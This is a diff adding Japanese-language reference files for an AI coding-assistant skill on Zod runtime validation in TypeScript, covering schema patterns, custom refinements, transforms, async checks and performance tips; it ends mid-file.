+  Douglas Crockfordの堅牢なデータ構造設計哲学に基づき、TypeScriptと統合された
+  型安全なスキーマ定義とバリデーションロジックを提供します。
+
+  専門分野:
+  - Zodスキーマ定義: プリミティブ型、オブジェクト、配列、ユニオン型の定義
+  - 型推論: z.infer<typeof schema>によるTypeScript型の自動生成
+  - カスタムバリデーション: .refine()、.superRefine()による高度な検証
+  - スキーマ合成: .extend()、.merge()、.pick()、.omit()によるスキーマ再利用
+  - 変換処理: .transform()、.preprocess()によるデータ正規化
+
+  使用タイミング:
+  - 新機能の入出力スキーマを定義する時
+  - APIリクエスト/レスポンスのバリデーションを実装する時
+  - データベーススキーマとTypeScript型の整合性を確保する時
+  - フォームバリデーションを実装する時
+
+  Use proactively when users need to define Zod schemas, implement runtime validation,
+  or ensure type safety between TypeScript and runtime data.
+version: 1.0.0
+---
+
+# Zod Validation
+
+## 概要
+
+このスキルは、Zodライブラリを使用したランタイムバリデーションと型推論に関する包括的な知識を提供します。
+Douglas Crockfordが提唱する「堅牢なデータ構造」の設計原則を適用し、TypeScriptの型システムと
+ランタイムバリデーションをシームレスに統合します。
+
+**主要な価値**:
+- TypeScript型とランタイムバリデーションの完全な統合
+- 再利用可能で保守性の高いスキーマ設計
+- パフォーマンスを考慮した最適化されたバリデーション
+
+**対象ユーザー**:
+- スキーマ定義を行うエージェント（@schema-def）
+- 入出力バリデーションを実装する開発者
+- 型安全なAPIを設計するチーム
+
+## リソース構造
+
+```
+zod-validation/
+├── SKILL.md                                    # 本ファイル（概要とワークフロー）
+├── resources/
+│   ├── schema-definition-patterns.md          # スキーマ定義パターン
+│   ├── type-inference-guide.md                # 型推論の詳細ガイド
+│   ├── custom-validation-techniques.md        # カスタムバリデーション技法
+│   └── performance-optimization.md            # パフォーマンス最適化
+├── scripts/
+│   └── validate-schema.mjs                    # スキーマ検証スクリプト
+└── templates/
+    ├── schema-template.ts                     # 標準スキーマテンプレート
+    └── api-schema-template.ts                 # APIスキーマテンプレート
+```
+
+## コマンドリファレンス
+
+### リソース読み取り
+
+```bash
+# スキーマ定義パターン
+cat .claude/skills/zod-validation/resources/schema-definition-patterns.md
+
+# 型推論ガイド
+cat .claude/skills/zod-validation/resources/type-inference-guide.md
+
+# カスタムバリデーション技法
+cat .claude/skills/zod-validation/resources/custom-validation-techniques.md
+
+# パフォーマンス最適化
+cat .claude/skills/zod-validation/resources/performance-optimization.md
+```
+
+### スクリプト実行
+
+```bash
+# スキーマファイルの検証
+node .claude/skills/zod-validation/scripts/validate-schema.mjs <schema.ts>
+```
+
+### テンプレート参照
+
+```bash
+# 標準スキーマテンプレート
+cat .claude/skills/zod-validation/templates/schema-template.ts
+
+# APIスキーマテンプレート
+cat .claude/skills/zod-validation/templates/api-schema-template.ts
+```
+
+## いつ使うか
+
+### シナリオ1: 新機能のスキーマ定義
+**状況**: 新機能の入出力データ構造を定義する必要がある
+
+**適用条件**:
+- [ ] 入力データの型と制約が明確に定義されている
+- [ ] TypeScriptとランタイムの両方で型を保証したい
+- [ ] 再利用可能なスキーマパーツが必要
+
+**期待される成果**: 型安全で再利用可能なZodスキーマ
+
+### シナリオ2: APIバリデーションの実装
+**状況**: APIエンドポイントのリクエスト/レスポンスを検証する
+
+**適用条件**:
+- [ ] リクエストボディの構造検証が必要
+- [ ] レスポンスの型保証が必要
+- [ ] エラーメッセージのカスタマイズが必要
+
+**期待される成果**: 堅牢なAPIバリデーションロジック
+
+### シナリオ3: フォームバリデーション
+**状況**: ユーザー入力のクライアントサイド検証を実装する
+
+**適用条件**:
+- [ ] フォームフィールドの検証ルールが定義されている
+- [ ] リアルタイムバリデーションが必要
+- [ ] サーバーサイドと共通のスキーマを使いたい
+
+**期待される成果**: 一貫したクライアント/サーバーバリデーション
+
+## 基本概念
+
+### Zodスキーマの基本原則
+
+**1. 型の明確性 (Type Clarity)**
+```typescript
+// ✅ 良い例: 明確な型定義
+const userSchema = z.object({
+  id: z.string().uuid(),
+  email: z.string().email(),
+  age: z.number().int().positive(),
+  role: z.enum(['admin', 'user', 'guest']),
+});
+
+// ❌ 悪い例: 曖昧な型
+const badSchema = z.object({
+  id: z.any(),
+  data: z.unknown(),
+});
+```
+
+**2. 防御的バリデーション (Defensive Validation)**
+```typescript
+// すべての外部入力は「信頼できない」と仮定
+const inputSchema = z.object({
+  username: z.string()
+    .min(3, '3文字以上必要です')
+    .max(50, '50文字以下にしてください')
+    .regex(/^[a-zA-Z0-9_]+$/, '英数字とアンダースコアのみ使用可能'),
+  password: z.string()
+    .min(8, '8文字以上必要です')
+    .regex(/[A-Z]/, '大文字を含めてください')
+    .regex(/[0-9]/, '数字を含めてください'),
+});
+```
+
+**3. シンプルさの追求 (Simplicity First)**
+```typescript
+// ✅ 良い例: フラットで理解しやすい構造
+const addressSchema = z.object({
+  street: z.string(),
+  city: z.string(),
+  postalCode: z.string(),
+});
+
+const userSchema = z.object({
+  name: z.string(),
+  address: addressSchema,  // 再利用可能なパーツ
+});
+
+// ❌ 悪い例: 過度にネストした構造
+const deeplyNestedSchema = z.object({
+  user: z.object({
+    profile: z.object({
+      contact: z.object({
+        address: z.object({
+          // 深すぎるネスト
+        }),
+      }),
+    }),
+  }),
+});
+```
+
+### 型推論の活用
+
+```typescript
+import { z } from 'zod';
+
+// スキーマ定義
+const productSchema = z.object({
+  id: z.string().uuid(),
+  name: z.string().min(1),
+  price: z.number().positive(),
+  category: z.enum(['electronics', 'clothing', 'books']),
+  tags: z.array(z.string()).optional(),
+  createdAt: z.coerce.date(),
+});
+
+// 型推論
+type Product = z.infer<typeof productSchema>;
+// → { id: string; name: string; price: number; category: 'electronics' | 'clothing' | 'books'; tags?: string[]; createdAt: Date }
+
+// 入力型と出力型を分離
+type ProductInput = z.input<typeof productSchema>;
+type ProductOutput = z.output<typeof productSchema>;
+```
+
+### スキーマ合成パターン
+
+```typescript
+// 基本スキーマ
+const baseEntitySchema = z.object({
+  id: z.string().uuid(),
+  createdAt: z.coerce.date(),
+  updatedAt: z.coerce.date(),
+});
+
+// 拡張
+const userSchema = baseEntitySchema.extend({
+  email: z.string().email(),
+  name: z.string(),
+});
+
+// 部分的な選択
+const userUpdateSchema = userSchema.pick({
+  email: true,
+  name: true,
+}).partial();  // すべてオプショナルに
+
+// 除外
+const publicUserSchema = userSchema.omit({
+  createdAt: true,
+  updatedAt: true,
+});
+```
+
+## 判断基準チェックリスト
+
+### スキーマ設計時
+- [ ] スキーマは再利用可能なパーツに分割されているか？
+- [ ] TypeScript型とZodスキーマの整合性が保たれているか？
+- [ ] バリデーションエラーメッセージは具体的か？
+- [ ] パフォーマンスへの影響を考慮しているか？
+
+### カスタムバリデーション時
+- [ ] カスタムバリデーションは必要最小限か？
+- [ ] エラーメッセージは具体的か？
+- [ ] 非同期バリデーションの使用は適切か？
+- [ ] ビジネスロジックと混同していないか？
+
+### 型推論時
+- [ ] z.infer<typeof schema>で型が正しく推論されるか？
+- [ ] ジェネリクスの使用が適切か？
+- [ ] 循環参照がないか？
+
+## 関連スキル
+
+- `.claude/skills/type-safety-patterns/SKILL.md` - TypeScript型安全性パターン
+- `.claude/skills/input-sanitization/SKILL.md` - 入力サニタイゼーション
+- `.claude/skills/error-message-design/SKILL.md` - エラーメッセージ設計
+- `.claude/skills/json-schema/SKILL.md` - JSON Schema仕様
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース - Zodバリデーションの基本パターン、型推論、スキーマ合成を網羅 |

--- a/.claude/skills/zod-validation/resources/custom-validation-techniques.md
+++ b/.claude/skills/zod-validation/resources/custom-validation-techniques.md
@@ -1,0 +1,447 @@
+# カスタムバリデーション技法
+
+## 概要
+
+Zodの組み込みバリデーターでは対応できない複雑な検証ロジックを実装するための
+テクニックを解説します。`.refine()`、`.superRefine()`、`.transform()`を適切に使い分け、
+堅牢なバリデーションを実現します。
+
+## refine() によるカスタムバリデーション
+
+### 基本的な使用法
+
+```typescript
+import { z } from 'zod';
+
+// 単一フィールドのカスタムバリデーション
+const passwordSchema = z.string()
+  .min(8)
+  .refine(
+    (password) => /[A-Z]/.test(password),
+    { message: '大文字を1文字以上含めてください' }
+  )
+  .refine(
+    (password) => /[a-z]/.test(password),
+    { message: '小文字を1文字以上含めてください' }
+  )
+  .refine(
+    (password) => /[0-9]/.test(password),
+    { message: '数字を1文字以上含めてください' }
+  )
+  .refine(
+    (password) => /[!@#$%^&*]/.test(password),
+    { message: '特殊文字(!@#$%^&*)を1文字以上含めてください' }
+  );
+```
+
+### 複数フィールド間のバリデーション
+
+```typescript
+// パスワード確認
+const signupSchema = z.object({
+  email: z.string().email(),
+  password: z.string().min(8),
+  confirmPassword: z.string(),
+}).refine(
+  (data) => data.password === data.confirmPassword,
+  {
+    message: 'パスワードが一致しません',
+    path: ['confirmPassword'], // エラーを表示するフィールド
+  }
+);
+
+// 日付範囲の検証
+const dateRangeSchema = z.object({
+  startDate: z.coerce.date(),
+  endDate: z.coerce.date(),
+}).refine(
+  (data) => data.endDate > data.startDate,
+  {
+    message: '終了日は開始日より後の日付を指定してください',
+    path: ['endDate'],
+  }
+);
+```
+
+### 条件付きバリデーション
+
+```typescript
+// タイプに応じた条件付きバリデーション
+const paymentSchema = z.object({
+  method: z.enum(['card', 'bank', 'cash']),
+  cardNumber: z.string().optional(),
+  bankAccount: z.string().optional(),
+}).refine(
+  (data) => {
+    if (data.method === 'card') {
+      return data.cardNumber !== undefined && data.cardNumber.length === 16;
+    }
+    if (data.method === 'bank') {
+      return data.bankAccount !== undefined && data.bankAccount.length > 0;
+    }
+    return true;
+  },
+  {
+    message: '選択した支払い方法に必要な情報を入力してください',
+  }
+);
+```
+
+## superRefine() による高度なバリデーション
+
+### 複数のエラーを返す
+
+```typescript
+const userSchema = z.object({
+  username: z.string(),
+  email: z.string(),
+  password: z.string(),
+}).superRefine((data, ctx) => {
+  // ユーザー名の検証
+  if (data.username.length < 3) {
+    ctx.addIssue({
+      code: z.ZodIssueCode.custom,
+      message: 'ユーザー名は3文字以上必要です',
+      path: ['username'],
+    });
+  }
+
+  if (!/^[a-zA-Z0-9_]+$/.test(data.username)) {
+    ctx.addIssue({
+      code: z.ZodIssueCode.custom,
+      message: 'ユーザー名は英数字とアンダースコアのみ使用可能です',
+      path: ['username'],
+    });
+  }
+
+  // パスワードの複合検証
+  const passwordIssues: string[] = [];
+  if (!/[A-Z]/.test(data.password)) {
+    passwordIssues.push('大文字');
+  }
+  if (!/[a-z]/.test(data.password)) {
+    passwordIssues.push('小文字');
+  }
+  if (!/[0-9]/.test(data.password)) {
+    passwordIssues.push('数字');
+  }
+
+  if (passwordIssues.length > 0) {
+    ctx.addIssue({
+      code: z.ZodIssueCode.custom,
+      message: `パスワードには${passwordIssues.join('、')}を含めてください`,
+      path: ['password'],
+    });
+  }
+});
+```
+
+### 条件分岐とエラーの詳細制御
+
+```typescript
+const productSchema = z.object({
+  type: z.enum(['physical', 'digital']),
+  price: z.number(),
+  weight: z.number().optional(),
+  downloadUrl: z.string().url().optional(),
+}).superRefine((data, ctx) => {
+  if (data.type === 'physical') {
+    if (data.weight === undefined || data.weight <= 0) {
+      ctx.addIssue({
+        code: z.ZodIssueCode.custom,
+        message: '物理商品には重量を指定してください',
+        path: ['weight'],
+      });
+    }
+    if (data.downloadUrl !== undefined) {
+      ctx.addIssue({
+        code: z.ZodIssueCode.custom,
+        message: '物理商品にダウンロードURLは不要です',
+        path: ['downloadUrl'],
+      });
+    }
+  }
+
+  if (data.type === 'digital') {
+    if (!data.downloadUrl) {
+      ctx.addIssue({
+        code: z.ZodIssueCode.custom,
+        message: 'デジタル商品にはダウンロードURLが必要です',
+        path: ['downloadUrl'],
+      });
+    }
+  }
+});
+```
+
+## transform() による変換処理
+
+### 基本的な変換
+
+```typescript
+// 文字列の正規化
+const normalizedStringSchema = z.string()
+  .transform((s) => s.trim().toLowerCase());
+
+// 数値への変換
+const numberFromStringSchema = z.string()
+  .transform((s) => parseInt(s, 10))
+  .refine((n) => !isNaN(n), { message: '有効な数値を入力してください' });
+
+// 日付への変換
+const dateSchema = z.string()
+  .transform((s) => new Date(s))
+  .refine((d) => !isNaN(d.getTime()), { message: '有効な日付を入力してください' });
+```
+
+### オブジェクトの変換
+
+```typescript
+// フラット化
+const apiResponseSchema = z.object({
+  data: z.object({
+    user: z.object({
+      id: z.string(),
+      name: z.string(),
+    }),
+  }),
+}).transform((response) => ({
+  userId: response.data.user.id,
+  userName: response.data.user.name,
+}));
+
+// フィールドの追加
+const userWithFullNameSchema = z.object({
+  firstName: z.string(),
+  lastName: z.string(),
+}).transform((data) => ({
+  ...data,
+  fullName: `${data.firstName} ${data.lastName}`,
+}));
+```
+
+### pipe() によるチェーン変換
+
+```typescript
+// 変換後に追加のバリデーション
+const positiveIntSchema = z.string()
+  .transform((s) => parseInt(s, 10))
+  .pipe(z.number().int().positive());
+
+// 複雑な変換パイプライン
+const processedInputSchema = z.string()
+  .transform((s) => s.trim())
+  .pipe(z.string().min(1))
+  .transform((s) => s.toLowerCase())
+  .transform((s) => s.replace(/\s+/g, '-'));
+```
+
+## 非同期バリデーション
+
+### refineAsync の使用
+
+```typescript
+// メールアドレスの重複チェック（データベース確認）
+const uniqueEmailSchema = z.string()
+  .email()
+  .refine(async (email) => {
+    const existing = await db.user.findUnique({ where: { email } });
+    return existing === null;
+  }, { message: 'このメールアドレスは既に使用されています' });
+
+// ユーザー名の利用可能性チェック
+const availableUsernameSchema = z.string()
+  .min(3)
+  .max(20)
+  .refine(async (username) => {
+    const isAvailable = await checkUsernameAvailability(username);
+    return isAvailable;
+  }, { message: 'このユーザー名は使用できません' });
+
+// parseAsync を使用して検証
+const user = await userSchema.parseAsync(data);
+```
+
+### 非同期バリデーションの注意点
+
+```typescript
+// ⚠️ パフォーマンス考慮
+const schema = z.object({
+  email: z.string().email().refine(async (email) => {
+    // データベースアクセスは最小限に
+    return await isEmailUnique(email);
+  }),
+  username: z.string().refine(async (username) => {
+    // 複数の非同期バリデーションは並列化される
+    return await isUsernameAvailable(username);
+  }),
+});
+
+// safeParse の非同期版
+const result = await schema.safeParseAsync(data);
+if (result.success) {
+  // 検証成功
+} else {
+  // エラー処理
+}
+```
+
+## カスタムエラーコード
+
+### ZodIssueCode の活用
+
+```typescript
+const customSchema = z.string().superRefine((val, ctx) => {
+  if (val.length < 3) {
+    ctx.addIssue({
+      code: z.ZodIssueCode.too_small,
+      minimum: 3,
+      type: 'string',
+      inclusive: true,
+      message: '3文字以上必要です',
+    });
+  }
+
+  if (!/^[a-z]+$/.test(val)) {
+    ctx.addIssue({
+      code: z.ZodIssueCode.invalid_string,
+      validation: 'regex',
+      message: '小文字のアルファベットのみ使用可能です',
+    });
+  }
+
+  // カスタムコード
+  if (val === 'admin') {
+    ctx.addIssue({
+      code: z.ZodIssueCode.custom,
+      message: 'この値は使用できません',
+      params: {
+        reason: 'reserved_word',
+        value: val,
+      },
+    });
+  }
+});
+```
+
+## 実践的なパターン
+
+### フォームバリデーション
+
+```typescript
+const registrationFormSchema = z.object({
+  email: z.string()
+    .email('有効なメールアドレスを入力してください'),
+  password: z.string()
+    .min(8, '8文字以上で入力してください'),
+  confirmPassword: z.string(),
+  agreeToTerms: z.literal(true, {
+    errorMap: () => ({ message: '利用規約に同意してください' }),
+  }),
+}).refine(
+  (data) => data.password === data.confirmPassword,
+  { message: 'パスワードが一致しません', path: ['confirmPassword'] }
+).superRefine((data, ctx) => {
+  // パスワード強度チェック
+  const strength = calculatePasswordStrength(data.password);
+  if (strength < 3) {
+    ctx.addIssue({
+      code: z.ZodIssueCode.custom,
+      message: 'パスワードが弱すぎます。大文字、数字、特殊文字を含めてください',
+      path: ['password'],
+    });
+  }
+});
+```
+
+### API入力バリデーション
+
+```typescript
+const createOrderSchema = z.object({
+  customerId: z.string().uuid(),
+  items: z.array(z.object({
+    productId: z.string().uuid(),
+    quantity: z.number().int().positive(),
+  })).min(1, '1つ以上の商品を選択してください'),
+  shippingAddress: z.object({
+    street: z.string().min(1),
+    city: z.string().min(1),
+    postalCode: z.string().regex(/^\d{3}-\d{4}$/),
+    country: z.string().length(2),
+  }),
+  couponCode: z.string().optional(),
+}).superRefine(async (data, ctx) => {
+  // クーポンコードの検証
+  if (data.couponCode) {
+    const coupon = await validateCoupon(data.couponCode);
+    if (!coupon.valid) {
+      ctx.addIssue({
+        code: z.ZodIssueCode.custom,
+        message: coupon.reason,
+        path: ['couponCode'],
+      });
+    }
+  }
+
+  // 在庫確認
+  for (let i = 0; i < data.items.length; i++) {
+    const item = data.items[i];
+    const stock = await checkStock(item.productId);
+    if (stock < item.quantity) {
+      ctx.addIssue({
+        code: z.ZodIssueCode.custom,
+        message: `在庫が不足しています（残り${stock}個）`,
+        path: ['items', i, 'quantity'],
+      });
+    }
+  }
+});
+```
+
+## ベストプラクティス
+
+### 1. バリデーションロジックの分離
+
+```typescript
+// ✅ 再利用可能なバリデーション関数
+const isStrongPassword = (password: string): boolean => {
+  return /[A-Z]/.test(password) &&
+         /[a-z]/.test(password) &&
+         /[0-9]/.test(password) &&
+         password.length >= 8;
+};
+
+const passwordSchema = z.string()
+  .refine(isStrongPassword, { message: 'パスワードが弱すぎます' });
+```
+
+### 2. エラーメッセージの一貫性
+
+```typescript
+// ✅ エラーメッセージを定数化
+const ERROR_MESSAGES = {
+  REQUIRED: '必須項目です',
+  INVALID_EMAIL: '有効なメールアドレスを入力してください',
+  PASSWORD_TOO_SHORT: 'パスワードは8文字以上必要です',
+  PASSWORDS_DONT_MATCH: 'パスワードが一致しません',
+} as const;
+```
+
+### 3. 非同期バリデーションの最小化
+
+```typescript
+// ❌ 不要な非同期バリデーション
+const badSchema = z.string().refine(async (s) => {
+  await sleep(100); // 不要な待機
+  return s.length > 0;
+});
+
+// ✅ 同期で可能なものは同期で
+const goodSchema = z.string().min(1);
+```
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース |

--- a/.claude/skills/zod-validation/resources/performance-optimization.md
+++ b/.claude/skills/zod-validation/resources/performance-optimization.md
@@ -1,0 +1,334 @@
+# パフォーマンス最適化
+
+## 概要
+
+大規模なデータセットや高頻度のバリデーションにおけるZodのパフォーマンスを
+最適化するためのテクニックを解説します。
+
+## 基本的な最適化原則
+
+### 1. スキーマのキャッシュ
+
+```typescript
+// ❌ 毎回スキーマを作成（非効率）
+function validateUser(data: unknown) {
+  const schema = z.object({
+    id: z.string(),
+    name: z.string(),
+  });
+  return schema.parse(data);
+}
+
+// ✅ スキーマを再利用（推奨）
+const userSchema = z.object({
+  id: z.string(),
+  name: z.string(),
+});
+
+function validateUser(data: unknown) {
+  return userSchema.parse(data);
+}
+```
+
+### 2. 不要な検証の回避
+
+```typescript
+// ❌ 内部データにも検証を適用
+function internalProcess(data: InternalData) {
+  const validated = schema.parse(data); // 不要な検証
+  return process(validated);
+}
+
+// ✅ 境界（API、ユーザー入力）でのみ検証
+function apiHandler(request: Request) {
+  const validated = schema.parse(request.body); // 外部入力を検証
+  return internalProcess(validated); // 内部では検証済みデータを使用
+}
+```
+
+## スキーマ設計の最適化
+
+### 1. フラットな構造を優先
+
+```typescript
+// ❌ 深いネストは遅い
+const deepSchema = z.object({
+  level1: z.object({
+    level2: z.object({
+      level3: z.object({
+        level4: z.object({
+          value: z.string(),
+        }),
+      }),
+    }),
+  }),
+});
+
+// ✅ フラットな構造は速い
+const flatSchema = z.object({
+  level1_level2_level3_level4_value: z.string(),
+});
+
+// または必要な深さのみ
+const optimalSchema = z.object({
+  nested: z.object({
+    value: z.string(),
+  }),
+});
+```
+
+### 2. 配列のサイズ制限
+
+```typescript
+// ❌ 無制限の配列
+const unboundedSchema = z.array(z.object({
+  id: z.string(),
+  data: z.string(),
+}));
+
+// ✅ サイズを制限
+const boundedSchema = z.array(z.object({
+  id: z.string(),
+  data: z.string(),
+})).max(1000); // 上限を設定
+
+// より効率的な検証
+const efficientArraySchema = z.array(z.string()).min(1).max(100);
+```
+
+### 3. strict() の適切な使用
+
+```typescript
+// strict() は追加のチェックを行うため遅くなる可能性
+const strictSchema = z.object({
+  name: z.string(),
+}).strict(); // 追加プロパティがあるとエラー
+
+// passthrough() は追加プロパティを許可（高速）
+const passthroughSchema = z.object({
+  name: z.string(),
+}).passthrough();
+
+// strip() は追加プロパティを除去（デフォルト動作と同じ）
+const stripSchema = z.object({
+  name: z.string(),
+}).strip();
+```
+
+## バリデーション戦略の最適化
+
+### 1. 早期失敗 (Early Return)
+
+```typescript
+// ❌ すべての検証を実行
+const slowSchema = z.object({
+  required1: z.string(),
+  required2: z.string(),
+  optional1: z.string().optional(),
+  optional2: z.string().optional(),
+  // 多くのオプションフィールド
+});
+
+// ✅ 重要なフィールドを先に検証
+const fastSchema = z.object({
+  // 必須フィールドを先に（早期失敗）
+  required1: z.string(),
+  required2: z.string(),
+}).and(z.object({
+  optional1: z.string().optional(),
+  optional2: z.string().optional(),
+}));
+```
+
+### 2. coerce vs transform
+
+```typescript
+// coerce は組み込みの型変換を使用（高速）
+const coerceSchema = z.coerce.number();
+const coerceDateSchema = z.coerce.date();
+
+// transform はカスタム変換を実行（柔軟だが遅い場合がある）
+const transformSchema = z.string().transform((s) => parseInt(s, 10));
+
+// パフォーマンスが重要な場合は coerce を優先
+```
+
+### 3. 条件付きスキーマの最適化
+
+```typescript
+// ❌ union は順番に試行（遅い可能性）
+const unionSchema = z.union([
+  z.object({ type: z.literal('a'), dataA: z.string() }),
+  z.object({ type: z.literal('b'), dataB: z.number() }),
+  z.object({ type: z.literal('c'), dataC: z.boolean() }),
+]);
+
+// ✅ discriminatedUnion は判別フィールドで直接判定（高速）
+const discriminatedSchema = z.discriminatedUnion('type', [
+  z.object({ type: z.literal('a'), dataA: z.string() }),
+  z.object({ type: z.literal('b'), dataB: z.number() }),
+  z.object({ type: z.literal('c'), dataC: z.boolean() }),
+]);
+```
+
+## 大規模データの処理
+
+### 1. バッチ処理
+
+```typescript
+// ❌ 個別に検証（遅い）
+async function validateItems(items: unknown[]) {
+  const results = [];
+  for (const item of items) {
+    results.push(itemSchema.parse(item));
+  }
+  return results;
+}
+
+// ✅ 配列として一括検証
+async function validateItemsBatch(items: unknown[]) {
+  const arraySchema = z.array(itemSchema);
+  return arraySchema.parse(items);
+}
+```
+
+### 2. ストリーミング検証
+
+```typescript
+// 大量データの逐次処理
+async function* validateStream(
+  dataStream: AsyncIterable<unknown>
+): AsyncGenerator<ValidatedItem> {
+  for await (const chunk of dataStream) {
+    try {
+      yield itemSchema.parse(chunk);
+    } catch (error) {
+      // エラーをログに記録して続行
+      console.error('Validation error:', error);
+    }
+  }
+}
+```
+
+### 3. Web Worker での非同期検証
+
+```typescript
+// メインスレッドをブロックしない検証
+// worker.ts
+self.onmessage = (event) => {
+  const { data, schemaType } = event.data;
+  const schema = getSchema(schemaType);
+  const result = schema.safeParse(data);
+  self.postMessage(result);
+};
+
+// main.ts
+const worker = new Worker('./worker.ts');
+worker.postMessage({ data: largeData, schemaType: 'user' });
+worker.onmessage = (event) => {
+  const result = event.data;
+  // 結果を処理
+};
+```
+
+## safeParse vs parse
+
+### safeParse の利点
+
+```typescript
+// parse は例外をスローする
+try {
+  const result = schema.parse(data);
+} catch (error) {
+  if (error instanceof z.ZodError) {
+    // エラー処理
+  }
+}
+
+// safeParse は例外をスローしない（若干高速）
+const result = schema.safeParse(data);
+if (result.success) {
+  const data = result.data;
+} else {
+  const errors = result.error;
+}
+
+// 大量のバリデーションでは safeParse が推奨
+function validateMany(items: unknown[]) {
+  return items.map((item) => {
+    const result = schema.safeParse(item);
+    return result.success ? result.data : null;
+  }).filter(Boolean);
+}
+```
+
+## ベンチマーク指針
+
+### パフォーマンス測定
+
+```typescript
+// 簡易ベンチマーク
+function benchmark(name: string, fn: () => void, iterations = 10000) {
+  const start = performance.now();
+  for (let i = 0; i < iterations; i++) {
+    fn();
+  }
+  const end = performance.now();
+  console.log(`${name}: ${(end - start).toFixed(2)}ms for ${iterations} iterations`);
+  console.log(`Average: ${((end - start) / iterations).toFixed(4)}ms per iteration`);
+}
+
+// 使用例
+benchmark('userSchema.parse', () => {
+  userSchema.parse({
+    id: '123',
+    name: 'Test User',
+    email: 'test@example.com',
+  });
+});
+```
+
+### 最適化の優先度
+
+1. **高優先度**: スキーマの再利用、discriminatedUnion の使用
+2. **中優先度**: フラット構造、配列サイズ制限
+3. **低優先度**: Web Worker、ストリーミング処理
+
+## アンチパターン
+
+```typescript
+// ❌ 動的スキーマ生成
+function createSchema(fields: string[]) {
+  const shape: Record<string, z.ZodString> = {};
+  fields.forEach((f) => { shape[f] = z.string(); });
+  return z.object(shape); // 毎回新しいスキーマを作成
+}
+
+// ❌ 過度な refine チェーン
+const overRefineSchema = z.string()
+  .refine(check1)
+  .refine(check2)
+  .refine(check3)
+  .refine(check4)
+  .refine(check5); // 各 refine で関数呼び出し
+
+// ✅ まとめて検証
+const optimizedSchema = z.string().refine((val) => {
+  return check1(val) && check2(val) && check3(val);
+});
+
+// ❌ 不要な transform
+const unnecessaryTransform = z.string()
+  .transform((s) => s) // 何もしない transform
+  .transform((s) => s.trim())
+  .transform((s) => s); // 何もしない transform
+
+// ✅ 必要な変換のみ
+const minimalTransform = z.string().transform((s) => s.trim());
+```
+
+## 変更履歴
+
+| バージョン | 日付 | 変更内容 |
+|-----------|------|---------|
+| 1.0.0 | 2025-11-25 | 初版リリース |

--- a/.claude/skills/zod-validation/resources/schema-definition-patterns.md
+++ b/.claude/skills/zod-validation/resources/schema-definition-patterns.md
@@ -1,0 +1,434 @@
+# スキーマ定義パターン
+
+## 概要
+
+Zodスキーマ定義における実践的なパターンと設計原則をまとめています。
+堅牢で再利用可能なスキーマを効率的に構築するための指針を提供します。
+
+## プリミティブ型パターン
+
+### 文字列型
+
+```typescript
+import { z } from 'zod';
+
+// 基本的な文字列制約
+const stringPatterns = {
+  // 長さ制約
+  username: z.string().min(3).max(50),
+
+  // 正規表現パターン
+  slug: z.string().regex(/^[a-z0-9-]+$/),
+
+  // 組み込みバリデーター
+  email: z.string().email(),
+  url: z.string().url(),
+  uuid: z.string().uuid(),
+  cuid: z.string().cuid(),
+
+  // 日付文字列
+  dateString: z.string().datetime(),
+
+  // 空白除去
+  trimmedString: z.string().trim(),
+
+  // 大文字/小文字変換
+  lowercase: z.string().toLowerCase(),
+  uppercase: z.string().toUpperCase(),
+};
+```
+
+### 数値型
+
+```typescript
+const numberPatterns = {
+  // 整数
+  integer: z.number().int(),
+
+  // 範囲制約
+  percentage: z.number().min(0).max(100),
+
+  // 符号制約
+  positiveInt: z.number().int().positive(),
+  nonNegative: z.number().nonnegative(),
+
+  // 有限数
+  finite: z.number().finite(),
+
+  // 安全な整数
+  safeInt: z.number().safe(),
+
+  // 倍数
+  multipleOf10: z.number().multipleOf(10),
+};
+```
+
+### 真偽値・日付型
+
+```typescript
+const otherPrimitives = {
+  // 真偽値
+  isActive: z.boolean(),
+
+  // 日付
+  createdAt: z.date(),
+
+  // 文字列からの日付変換
+  dateFromString: z.coerce.date(),
+
+  // リテラル
+  status: z.literal('active'),
+
+  // null/undefined
+  nullable: z.string().nullable(),
+  optional: z.string().optional(),
+  nullish: z.string().nullish(), // null | undefined
+};
+```
+
+## オブジェクト型パターン
+
+### 基本構造
+
+```typescript
+// 標準的なオブジェクトスキーマ
+const userSchema = z.object({
+  id: z.string().uuid(),
+  email: z.string().email(),
+  name: z.string().min(1),
+  age: z.number().int().positive().optional(),
+});
+
+// 型推論
+type User = z.infer<typeof userSchema>;
+```
+
+### 厳格モード
+
+```typescript
+// 追加プロパティを拒否
+const strictSchema = z.object({
+  name: z.string(),
+}).strict();
+
+// 追加プロパティを許可（型には含まれない）
+const looseSchema = z.object({
+  name: z.string(),
+}).passthrough();
+
+// 追加プロパティを除去
+const stripSchema = z.object({
+  name: z.string(),
+}).strip();
+```
+
+### ネストとフラット化
+
+```typescript
+// ネストされた構造
+const addressSchema = z.object({
+  street: z.string(),
+  city: z.string(),
+  postalCode: z.string(),
+});
+
+const personSchema = z.object({
+  name: z.string(),
+  address: addressSchema,
+});
+
+// フラット化が必要な場合
+const flatPersonSchema = z.object({
+  name: z.string(),
+  street: z.string(),
+  city: z.string(),
+  postalCode: z.string(),
+});
+```
+
+## 配列型パターン
+
+```typescript
+const arrayPatterns = {
+  // 基本配列
+  strings: z.array(z.string()),
+
+  // 要素数制約
+  nonEmpty: z.array(z.string()).nonempty(),
+  limitedSize: z.array(z.string()).min(1).max(10),
+
+  // ユニークな要素（カスタムバリデーション）
+  uniqueStrings: z.array(z.string()).refine(
+    (items) => new Set(items).size === items.length,
+    { message: '重複する要素があります' }
+  ),
+
+  // タプル型
+  coordinate: z.tuple([z.number(), z.number()]),
+  namedTuple: z.tuple([z.string(), z.number(), z.boolean()]),
+};
+```
+
+## ユニオン型パターン
+
+### 基本ユニオン
+
+```typescript
+// 単純なユニオン
+const stringOrNumber = z.union([z.string(), z.number()]);
+
+// 列挙型
+const status = z.enum(['pending', 'approved', 'rejected']);
+
+// ネイティブEnum
+enum UserRole {
+  Admin = 'admin',
+  User = 'user',
+  Guest = 'guest',
+}
+const roleSchema = z.nativeEnum(UserRole);
+```
+
+### Discriminated Union
+
+```typescript
+// タグ付きユニオン（推奨パターン）
+const eventSchema = z.discriminatedUnion('type', [
+  z.object({
+    type: z.literal('click'),
+    x: z.number(),
+    y: z.number(),
+  }),
+  z.object({
+    type: z.literal('scroll'),
+    scrollY: z.number(),
+  }),
+  z.object({
+    type: z.literal('keypress'),
+    key: z.string(),
+  }),
+]);
+
